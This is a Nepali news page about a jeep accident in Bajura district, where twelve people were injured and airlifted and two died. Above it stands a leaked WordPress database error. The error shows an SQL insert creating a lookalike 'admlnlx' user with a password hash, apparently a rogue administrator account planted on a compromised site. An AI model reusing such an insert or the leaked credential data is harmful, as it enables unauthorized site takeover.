WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfq0wOssb/jEpwqixY5QSAO3BQSGmk1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 05:47:35', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, ३ साउन, बाजुरा । बाजुराबाट कालीकोट जाँदै गरेको जीप जगन्नाथ गाउँपालिकाको भुँवा खोलामा दुर्घटनामा परी घाइते भएका १२ जनाको हेलिकप्टरबाट उद्धार गरिएको छ ।
शुक्रबार बिहान दुर्घटना हुँदा घाइते हुनेमा मुगु जिल्ला खत्याड गाउँपालिका-६ का २८ वर्षीय उभजङ्गबहादुर शाही, सोही ठाउँ बस्ने १७ वर्षीय राजेन्द्रबहादुर शाही र १८ वर्षीय मेहन्द्रबहादुर शाही रहेको जिल्ला प्रहरी कार्यालय बाजुराका प्रहरी नायब उपरीक्षक उद्धवसिंह भाटले बताए ।
सबै घाइतेलाई नेपाली सेनाको हेलिकप्टर मार्फत उद्वार गरिएको स्थानिय प्रहरिले जनाएको छ । बाजुराको हिमाली गाउँपालिका-४ रुगिनको फैती बस्ने ५५ वर्षीय लालवीर चदाराको अवस्था गम्भीर भएकाले थप उपचारका लागि नेपालगञ्जमा रहेको कोहलपुर मेडिकलमा हेलिकप्टरमा लगिएको प्रहरी नायब उपरीक्षक भाटले बताए ।
दुर्घटनामा परी घाइते भएका १२ जनाको उपचारका लागि सङ्घीय गृह मन्त्रलायसँगको समन्वयमा उद्धार गरिएको प्रमुख जिल्ला अधिकारी न्यौपानेले बताए ।
दुर्घटनामा परी कैलालीको टीकापुर नगरपालिका-४ का २६ वर्षीय जीप चालक रमेश बोगटी र मुगुको खत्याड गाउँपालिका-६ का २४ वर्षीय रामबहादुर शाहीको घटनास्थलमा नै मृत्यु भएको प्रहरीले जनाएको छ ।
साभार: अनलाइनखबर